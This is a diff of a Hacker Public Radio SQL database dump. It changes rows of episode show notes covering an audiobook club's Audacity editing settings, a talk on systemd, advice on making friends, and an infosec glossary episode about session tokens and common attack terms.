  • Burroughs is kind of verbose, which is symbolic of the time period\nin which it was written.
  • \n
\n

Beverage Reviews

\n
\n
    \n
  • Thaj: Tempting fate with a tall glass of the highly\ntoxic, Dihydrogen\nMonoxide
  • \n
  • x1101: Shipyard\nLittle Horror of Hops Its a very amber IPA
  • \n
  • Pokey: Yellow Tail\nChardonay Its definitely a chardonay in flavor. You can taste the\ncost effectiveness up front, but it mellows out on the finish, and is\npretty okay for the price on average.
  • \n
  • FiftyOneFifty: Funky Pumpkin spiced\npumpkin ale
  • \n
  • Mark: Lagunitas IPA
  • \n
\n

Things We Talked About

\n
\n
    \n
  • Chat Secure secure XMPP,\nThink of the children!!!

  • \n
  • Technology on Barsoom

  • \n
  • Deus Ex Machina much???

  • \n
  • Names in fantasy books

  • \n
\n

Our Next Audiobook

\n
\n

See\nYou At The Morgue by Lawrence Blochman

\n

The Next Audiobook Club\nRecording

\n
\n

Right now we are working through a backlog of older episode that have\nalready been recorded. Once that ends we fully anticipate recording new\nepisodes with listener participation.

\n

Feedback

\n
\n

Thank you very much for listening to this episode of the HPR\nAudioBookClub. We had a great time recording this show, and we hope you\nenjoyed it as well. We also hope you\'ll consider joining us next time we\nrecord a new episode. Please leave a few words in the episode\'s comment\nsection.

\n

As always; remember to visit the HPR contribution page HPR could\nreally use your help right now.

\n

Sincerely, The HPR Audiobook Club

\n

P.S. Some people really like finding mistakes. For their enjoyment,\nwe always include a few.

\n

Our Audio

\n
\n

This episode was processed using Audacity. We\'ve been making\nsmall adjustments to our audio mix each month in order to get the best\npossible sound. Its been especially challenging getting all of our\nvoices relatively level, because everyone has their own unique setup.\nMumble is great for bringing us all together, and for recording, but\nit\'s not good at making everyone\'s voice the same volume. We\'re pretty\nhappy with the way this month\'s show turned out, so we\'d like to share\nour editing process and settings with you and our future selves (who, of\ncourse, will have forgotten all this by then).

\n

We use the \"Truncate Silence\" effect with it\'s default settings to\nminimize the silence between people speaking. When used with it\'s\ndefault (or at least reasonable) settings, Truncate Silence is extremely\neffective and satisfying. It makes everyone sound smarter, it makes the\nfile shorter without destroying actual content, and it makes a\nconversations sound as easy and fluid during playback as it was while it\nwas recorded. It can be even more effective if you can train yourself to\nremain silent instead of saying \"uuuuummmm.\" Just remember to ONLY pass\nthe file through Truncate Silence ONCE. If you pass it through a second\ntime, or if you set it too aggressively your audio may sound sped up and\nchoppy.

\n

Next we use the \"Compressor\" effect with the following settings:

\n
Threshold: -30db\n\nNoise Floor: -50db\n\nRatio: 3:1\n\nAttack Time: 0.2sec\n\nDecay Time: 1.0 sec
\n

\"Make-up Gain for 0db after compressing\" and \"compress based on\npeaks\" were both left un-checked.

\n

After compressing the audio we cut any pre-show and post-show chatter\nfrom the file and save them in a separate file for possible use as\nouttakes after the closing music.

\n

We adjust the Gain so that the VU meter in Audacity hovers around\n-12db while people are speaking, and we try to keep the peaks under\n-6db, and we adjust the Gain on each of the new tracks so that all\nvolumes are similar, and more importantly comfortable. Once this is done\nwe can \"Mix and Render\" all of our tracks into a single track for export\nto the .FLAC file which is uploaded to the HPR server.

\n

At this point we listen back to the whole file and we work on the\nshownotes. This is when we can cut out anything that needs to be cut,\nand we can also make sure that we put any links in the shownotes that\nwere talked about during the recording of the show. We finish the\nshownotes before exporting the .aup file to .FLAC so that we can paste a\ncopy of the shownotes into the audio file\'s metadata.

\n

At this point we add new, empty audio tracks into which we paste the\nintro, outro and possibly outtakes, and we rename each track\naccordingly.

\n

Remember to save often when using Audacity. We like to save after\neach of these steps. Audacity has a reputation for being \"crashy\" but if\nyou remember save after every major transform, you will wonder how it\never got that reputation.

\n

Attribution

\n
\n

Record\nScratch Creative Commons 0

\n',157,0,1,'CC-BY-SA','mars, audiobook club, fiction, scifi, audiobook',0,0,1), (4151,'2024-07-01','HPR Community News for June 2024',0,'HPR Volunteers talk about shows released and comments posted in June 2024','',159,47,1,'CC-BY-SA','Community News',0,0,1), (4176,'2024-08-05','HPR Community News for July 2024',0,'HPR Volunteers talk about shows released and comments posted in July 2024','',159,47,1,'CC-BY-SA','Community News',0,0,1), -(3902,'2023-07-18','Introduction to a new series on FFMPEG',474,'In this episode, I introduce FFMPEG, media containers, and codecs','

Links

\n\n\n',300,0,0,'CC-BY-SA','ffmpeg,video streaming,audio streaming',0,0,1); -INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hostid`, `series`, `explicit`, `license`, `tags`, `version`, `downloads`, `valid`) VALUES (3903,'2023-07-19','Why I don\'t love systemd (yet)',396,'Klaatu reads a script by Deepgeek about systemd','

I\'ve been meaning to put down my thoughts about SystemD for the HPR\ncommunity for some while, so here goes.

\n

I want to say that I am not a SystemD hater. When SystemD was a hot\ntopic of debate, many became irrational over it, but I want to start by\nsaying that I don\'t think it\'s a bad technology. I think it is a rather\ngood technology. I just don\'t want it on my personal computer. So I\nwould like to run things down in this order: what is it (as in, what is\nit really,) what makes it a good technology, why I don\'t want it now\n(but might later,) and a few tips for you if you decide that you don\'t\nwant it currently.

\n

SystemD Is not an init system. SystemD includes an init system.\nSystemD Init was faster than SysVInit, but SystemD Init isn\'t the\nfastest init system, and SysVInit now has a parallelization helper, at\nleast on Debian.

\n

So, if SystemD Init is not SystemD, than what is SystemD? To\nunderstand this we must first understand something about Linux. Linux\noperates under a model where there are root processes, and there are\nuser processes. These two kinds of processes are usually called\n\"layers.\" SystemD is actually a third layer, that can be called a system\nlayer. So when SystemD is added to a Linux system, that changes the\nsystem so that there are three layers, a root layer, a user layer, and a\nsystem layer. As such, you now ask SystemD to set how the system runs.\nThis is why SystemD includes things like an init system, because if you\nwant to change what the system is running, you ask SystemD to change it.\nSystemD then messages an appropriate system to implement the change,\nlike messaging its init system to bring up or bring down a system\ndaemon. Once you play out this in your head a bit, you really realize\nthat SystemD acts more like a message passing system in this regard.

\n

So why do I say SystemD is a good technology? Because this can\nstandardize system control. Without SystemD a fleet of computers becomes\nlike individual fingerprints or unique snowflakes. If you manage many\ncomputers, as many professional IT people do, you want them to all run\nthe same, all have the same profiles and general configurations. So if\nyou have a bunch of computers you are running, you can run a lot more if\nthey are all run the same way. If your job requires you to run 10,000\nwebservers, you want them to run identically because it is impossible to\nkeep an understanding of 10,000 unique configurations in a human\nhead.

\n

SystemD really shines in its support of virtualization as well. So\nto speak of servers, I used to run an email server for a few friends.\nEach of us had a userid and number as unix users. The mapping of unix\nuserids and postfix userids can get confusing when it gets big. Thanks\nto SystemD\'s virtualization work, you can actually put a service like\nemail into a namespace situation so that it has only the users root and\nthe daemon user id (like \"postfix\"), so SystemD greatly enhances\nsecurity for server installations. This might help explain its\ndominance in linux distributions that have been traditionally\nserver-centric, such as debian and redhat.

\n

So why don\'t I don\'t want it? Well, I\'ve been doing a lot of talking\nabout professional computer work and corporate work environments, but I\nuse a \"Personal Computer\" as a hobby. I\'ve been out-of-industry for\ndecades now. And when I say \"Personal Computer\" I\'m not talking a\nhardware specification, rather I\'m talking about \"This is my personal\ncomputer where I do things my way, as opposed to my work computer where\nI do things my companies way\". Dear listener, please remember that I did\nthe first community show contribution to HPR, and my topic was about\npersonalization. For me, a hobbyist interested in operating system\nexperimentation, I don\'t want a system layer, I want a traditional\nunix-like system that operates on a two-layer model and does things my\nway, nobody else\'s way.

\n

So, what advice can I give to those who don\'t want SystemD now? Well,\nrecently I\'ve left Debian. Debian, you see, supports init system\ndiversity, but as you now know dear listener, that is different than\nbeing without SystemD. You may have heard that SystemD is\nlinux-specific, that is to say that it runs only on linux, not anything\nlike a BSD system or a Windows system. But you may be curious to know\nthat it is also Gnu-libC specific. Which means that the C compiler must\nuse GNU\'s libC standard library. Thus, if you have a system built around\nthe Musl C standard library like Alpine or Void, or a system like\nAndroid that runs on the Bionic C Standard library, you wont have a\nSystemD system. I\'m personally learning Void as its package manager\nsupports both binary and a ports collection much like the BSD\'s. But\nthat is what I\'m doing on my personal computer, I leave you in the\nfreedom to do things your way on your personal computer!

\n\n',73,99,0,'CC-BY-SA','systemd,linux',0,0,1), +(3902,'2023-07-18','Introduction to a new series on FFMPEG',474,'In this episode, I introduce FFMPEG, media containers, and codecs','

Links

\n\n\n',300,0,0,'CC-BY-SA','ffmpeg,video streaming,audio streaming',0,0,1), +(3903,'2023-07-19','Why I don\'t love systemd (yet)',396,'Klaatu reads a script by Deepgeek about systemd','

I\'ve been meaning to put down my thoughts about SystemD for the HPR\ncommunity for some while, so here goes.

\n

I want to say that I am not a SystemD hater. When SystemD was a hot\ntopic of debate, many became irrational over it, but I want to start by\nsaying that I don\'t think it\'s a bad technology. I think it is a rather\ngood technology. I just don\'t want it on my personal computer. So I\nwould like to run things down in this order: what is it (as in, what is\nit really,) what makes it a good technology, why I don\'t want it now\n(but might later,) and a few tips for you if you decide that you don\'t\nwant it currently.

\n

SystemD Is not an init system. SystemD includes an init system.\nSystemD Init was faster than SysVInit, but SystemD Init isn\'t the\nfastest init system, and SysVInit now has a parallelization helper, at\nleast on Debian.

\n

So, if SystemD Init is not SystemD, than what is SystemD? To\nunderstand this we must first understand something about Linux. Linux\noperates under a model where there are root processes, and there are\nuser processes. These two kinds of processes are usually called\n\"layers.\" SystemD is actually a third layer, that can be called a system\nlayer. So when SystemD is added to a Linux system, that changes the\nsystem so that there are three layers, a root layer, a user layer, and a\nsystem layer. As such, you now ask SystemD to set how the system runs.\nThis is why SystemD includes things like an init system, because if you\nwant to change what the system is running, you ask SystemD to change it.\nSystemD then messages an appropriate system to implement the change,\nlike messaging its init system to bring up or bring down a system\ndaemon. Once you play out this in your head a bit, you really realize\nthat SystemD acts more like a message passing system in this regard.

\n

So why do I say SystemD is a good technology? Because this can\nstandardize system control. Without SystemD a fleet of computers becomes\nlike individual fingerprints or unique snowflakes. If you manage many\ncomputers, as many professional IT people do, you want them to all run\nthe same, all have the same profiles and general configurations. So if\nyou have a bunch of computers you are running, you can run a lot more if\nthey are all run the same way. If your job requires you to run 10,000\nwebservers, you want them to run identically because it is impossible to\nkeep an understanding of 10,000 unique configurations in a human\nhead.

\n

SystemD really shines in its support of virtualization as well. So\nto speak of servers, I used to run an email server for a few friends.\nEach of us had a userid and number as unix users. The mapping of unix\nuserids and postfix userids can get confusing when it gets big. Thanks\nto SystemD\'s virtualization work, you can actually put a service like\nemail into a namespace situation so that it has only the users root and\nthe daemon user id (like \"postfix\"), so SystemD greatly enhances\nsecurity for server installations. This might help explain its\ndominance in linux distributions that have been traditionally\nserver-centric, such as debian and redhat.

\n

So why don\'t I don\'t want it? Well, I\'ve been doing a lot of talking\nabout professional computer work and corporate work environments, but I\nuse a \"Personal Computer\" as a hobby. I\'ve been out-of-industry for\ndecades now. And when I say \"Personal Computer\" I\'m not talking a\nhardware specification, rather I\'m talking about \"This is my personal\ncomputer where I do things my way, as opposed to my work computer where\nI do things my companies way\". Dear listener, please remember that I did\nthe first community show contribution to HPR, and my topic was about\npersonalization. For me, a hobbyist interested in operating system\nexperimentation, I don\'t want a system layer, I want a traditional\nunix-like system that operates on a two-layer model and does things my\nway, nobody else\'s way.

\n

So, what advice can I give to those who don\'t want SystemD now? Well,\nrecently I\'ve left Debian. Debian, you see, supports init system\ndiversity, but as you now know dear listener, that is different than\nbeing without SystemD. You may have heard that SystemD is\nlinux-specific, that is to say that it runs only on linux, not anything\nlike a BSD system or a Windows system. But you may be curious to know\nthat it is also Gnu-libC specific. Which means that the C compiler must\nuse GNU\'s libC standard library. Thus, if you have a system built around\nthe Musl C standard library like Alpine or Void, or a system like\nAndroid that runs on the Bionic C Standard library, you wont have a\nSystemD system. I\'m personally learning Void as its package manager\nsupports both binary and a ports collection much like the BSD\'s. But\nthat is what I\'m doing on my personal computer, I leave you in the\nfreedom to do things your way on your personal computer!

\n\n',73,99,0,'CC-BY-SA','systemd,linux',0,0,1), (3904,'2023-07-20','How to make friends',2861,'This topic is being actively researched. Not for production use.','

Show notes

\n
    \n
  • \n

    No clear mark of when friendship starts

    \n
  • \n
  • \n

    often feels \"right\" when mutual

    \n
  • \n
  • \n

    to some people friendship is a persistent state. once you have it, it's forever unless explicitly dissolved.

    \n
  • \n
  • \n

    for other people, it's something requiring maintenance. arguable this suggests that there are degrees of friendship, based on when you last spoke to one another.

    \n
  • \n
  • \n

    degrees of friendship also suggests progression. friend → close friend → best friend.

    \n
  • \n
\n

how to make a friend

\n

friendship requires communication.

\n
    \n
  • \n

    start by communicating in some way that makes the other person feel not unpleasant

    \n
  • \n
  • \n

    you're not supposed to target a friend. this can be a frustrating rule, because if you're trying to make a friend, you have to target somebody, but the general consensus is that you're not supposed to \"try too hard\". target lots of people in the hopes of stumbling across somebody to befriend.

    \n
  • \n
  • \n

    complimenting something they have done, even if it's something simple like wearing a cool shirt, is a very easy start

    \n
  • \n
  • \n

    finding ground common allows for repeated communication

    \n
  • \n
  • \n

    repetition of this is what builds friendship. this is why friendships often develop at work, but can dissolve quickly after a job change.

    \n
  • \n
  • \n

    the situation matters. chatting with someone who's being paid to interact with you, like somebody working at a store, doesn't count because in context they more or less cannot choose to stop communicating with you until you leave the store. chatting with someone who has anything to gain by chatting with you doesn't count (like an intern at work).

    \n
  • \n
  • \n

    to speed up a developing friendship, you can invite the person to interact with you on something with a clearly defined goal. You like coding? I like coding! Would you care to collaborate for 4 hours on a script that would help me find my Raspberry Pi on my network?

    \n
  • \n
  • \n

    during the activity, continue to communicate. this can be difficult because you're doing an activity that you both claim to enjoy, so in theory the activity should be sufficient to further the friendship. However, the activity doesn't build the friendship, it only builds a partnership. It's the communication that builds friendship.

    \n
  • \n
\n

unfortunately, there's no clear point during this process at which you know you have made a friend. so you have to define what a friend is, to you, and then work toward that goal.

\n

Here are some examples of definitions for friendship. There is no right or wrong here, it's really just setting your own expectations and requirements:

\n
    \n
  • \n

    A friend is someone to hang out with on sundays.

    \n
  • \n
  • \n

    A friend is someone I can call when I've got some free time to kill.

    \n
  • \n
  • \n

    A friend is someone I can play video games with online.

    \n
  • \n
  • \n

    A friend is someone I can call, day or night, when I need help.

    \n
  • \n
  • \n

    A friend is someone who has come over for dinner, and has met my family, and who I see at least once a month.

    \n
  • \n
\n

There's no official definition, so you must define it yourself.\nYour definition may differ from the other person's definition.\nYou might say \"we are best friends\" but they might say \"no, I already have a best friend, but you're a good friend\" and THAT'S OK.

\n

If it helps, classify what kinds of friends you have so you understand what kinds of relationships you are maintaining.\nCommunicate with your friends, even if it's only to let them know that you're bad at communicating on a regular basis, or ask them how frequently they need to communicate to maintain a healthy friendship.

\n',78,108,0,'CC-BY-SA','autism,friendship,relationship,social engineering',0,0,1), (3905,'2023-07-21','Presenting Fred Black',1105,'I have a short talk to present Fred Black.','
    \n
  • IB-program https://ibo.org/
  • \n
  • Animals To The Max https://corbinmaxey.com/podcast-1
  • \n
  • I Spend A Day With... https://feeds.megaphone.fm/ispentadaywith
  • \n
  • The Vinyl Guide https://www.thevinylguide.com/
  • \n
  • NSOD - Norsken, Svensken og Dansken https://podkast.nrk.no/program/norsken_svensken_og_dansken.rss
  • \n
\n',309,0,0,'CC-BY-SA','school,podcasts,instrument,quiz',0,0,1), (3906,'2023-07-24','The Oh No! News.',1741,'Sgoti discusses the threat of convenience.','

The Oh No! news.

\n

Oh No! News is Good\nNews.

\n
    \n
  • TAGS: Oh No News, InfoSec, browser security,\nsession tokens, session id
  • \n
\n
\n

InfoSec; the language\nof security.

\n
    \n
  • Source: Session ID.
    \n
  • \n
  • Source: JSON Web\nToken.
    \n\n
      \n
    • Terms\nof Use: Copyleft, free content
      \n
    • \n
  • \n
  • Source: Session\nvs Token Based Authentication.
    \n\n
      \n
    • Terms\nof Use: CC-BY-SA (with CC-BY-NC-SA elements).
      \n
    • \n
  • \n
  • Source: Steal Application\nAccess Token. Adversaries can steal application access tokens as a\nmeans of acquiring credentials to access remote systems and resources.\nApplication access tokens are used to make authorized API requests on\nbehalf of a user or service and are commonly used as a way to access\nresources in cloud and container-based applications and\nsoftware-as-a-service (SaaS).
    \n\n
      \n
    • Terms of\nUse: Similar to CC-BY-SA
      \n
    • \n
  • \n
  • Source: Analysis:\nCircleCI attackers stole session cookie to bypass MFA.
    \n\n
      \n
    • Terms of\nUse: Section 8. CONTENT AND CONTENT LICENSES. NOT\ncertain
      \n
    • \n
  • \n
  • Source: How to Prevent\nSession Hijacking?
    \n\n
  • \n
\n
\n
    \n
  • Additional Information.\n
      \n
    • What is a \"Data\nBreach\"? A data breach is a security violation, in which sensitive,\nprotected or confidential data is copied, transmitted, viewed, stolen,\naltered or used by an individual unauthorized to do so.
    • \n
    • What is \"Malware\"?\nMalware (a portmanteau for\nmalicious software) is any software intentionally designed to cause\ndisruption to a computer, server, client, or computer network, leak\nprivate information, gain unauthorized access to information or systems,\ndeprive access to information, or which unknowingly interferes with the\nuser\'s computer security and privacy.
    • \n
    • What is a \"Payload\"?\nIn the context of a computer virus or worm, the payload is the portion\nof the malware which performs malicious action; deleting data, sending\nspam or encrypting data. In addition to the payload, such malware also\ntypically has overhead code aimed at simply spreading itself, or\navoiding detection.
    • \n
    • What is \"Phishing\"?\nPhishing is a form of social engineering\nwhere attackers deceive people into revealing sensitive information or\ninstalling malware such as ransomware. Phishing\nattacks have become increasingly sophisticated and often transparently\nmirror the site being targeted, allowing the attacker to observe\neverything while the victim is navigating the site, and transverse any\nadditional security boundaries with the victim.
    • \n
    • Social\nengineering (security) In the context of information security,\nsocial engineering is the psychological\nmanipulation of people into performing actions or divulging\nconfidential information. A type of confidence trick for the purpose of\ninformation gathering, fraud, or system access, it differs from a\ntraditional \"con\" in that it is often one of many steps in a more\ncomplex fraud scheme.
      \n
    • \n
    • What is \"Information\nSecurity\" (InfoSec)? Information security, sometimes shortened to\nInfoSec, is the practice of protecting information by mitigating information risks. It\nis part of information risk\nmanagement.\n
        \n
      • Information Security Attributes: Confidentiality, Integrity and Availability (C.I.A.).\nInformation Systems are composed in three main portions, hardware,\nsoftware and communications with the purpose to help identify and apply\ninformation security industry standards, as mechanisms of protection and\nprevention, at three levels or layers: physical, personal and\norganizational. Essentially, procedures or policies are implemented to\ntell administrators, users and operators how to use products to ensure\ninformation security within the organizations.
      • \n
    • \n
    • What is \"Risk\nmanagement\"? Risk management is the identification, evaluation, and\nprioritization of risks followed by coordinated and economical\napplication of resources to minimize, monitor, and control the\nprobability or impact of unfortunate events or to maximize the\nrealization of opportunities.
    • \n
    • What is a \"Vulnerability\"\n(computing)? Vulnerabilities are flaws in a computer system that\nweaken the overall security of the device/system. Vulnerabilities can be\nweaknesses in either the hardware itself, or the software that runs on\nthe hardware.
    • \n
    • What is an \"Attack\nSurface\"? The attack surface of a software environment is the sum of\nthe different points (for \"attack vectors\") where an unauthorized user\n(the \"attacker\") can try to enter data to or extract data from an\nenvironment. Keeping the attack surface as small as possible is a basic\nsecurity measure.
    • \n
    • What is an \"Attack\nVector\"? In computer security, an attack vector is a specific path,\nmethod, or scenario that can be exploited to break into an IT system,\nthus compromising its security. The term was derived from the\ncorresponding notion of vector in biology. An attack vector may be\nexploited manually, automatically, or through a combination of manual\nand automatic activity.
    • \n
    • What is\n\"Standardization\"? Standardization is the process of implementing\nand developing technical standards based on the consensus of different\nparties that include firms, users, interest groups, standards\norganizations and governments. Standardization can help maximize\ncompatibility, interoperability, safety, repeatability, or quality. It\ncan also facilitate a normalization of formerly custom processes.\n
    • \n
    • What is a \"Replay\nattack\"? A replay attack is a form of network attack in which valid\ndata transmission is maliciously or fraudulently repeated or delayed.\nAnother way of describing such an attack is: \"an attack on a security\nprotocol using a replay of messages from a different context into the\nintended (or original and expected) context, thereby fooling the honest\nparticipant(s) into thinking they have successfully completed the\nprotocol run.\"
    • \n
    • What is a\n\"Man-in-the-middle attack\"? In cryptography and computer security, a\nman-in-the-middle, ..., attack is a cyberattack where the attacker\nsecretly relays and possibly alters the communications between two\nparties who believe that they are directly communicating with each\nother, as the attacker has inserted themselves between the two\nparties.
    • \n
    • What is \"Transport Layer\nSecurity\" (TLS)? Transport Layer Security (TLS) is a cryptographic\nprotocol designed to provide communications security over a computer\nnetwork. The protocol is widely used in applications such as email,\ninstant messaging, and voice over IP, but its use in securing HTTPS\nremains the most publicly visible.
    • \n
    • What is a \"Handshake\"\n(computing)?. In computing, a handshake is a signal between two\ndevices or programs, used to, e.g., authenticate, coordinate. An example\nis the handshaking between a hypervisor and an application in a guest\nvirtual machine.
    • \n
    • What is Security\ntheater? The practice of taking security measures that are\nconsidered to provide the feeling of improved security while doing\nlittle or nothing to achieve it.
      \n
    • \n
  • \n
\n
\n\n',391,74,0,'CC-BY-SA','Oh No News, InfoSec, browser security, session tokens, session id',0,0,1), @@ -21178,4 +21178,4 @@ UNLOCK TABLES; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; --- Dump completed on 2023-09-01 9:29:29 +-- Dump completed on 2023-09-02 11:46:27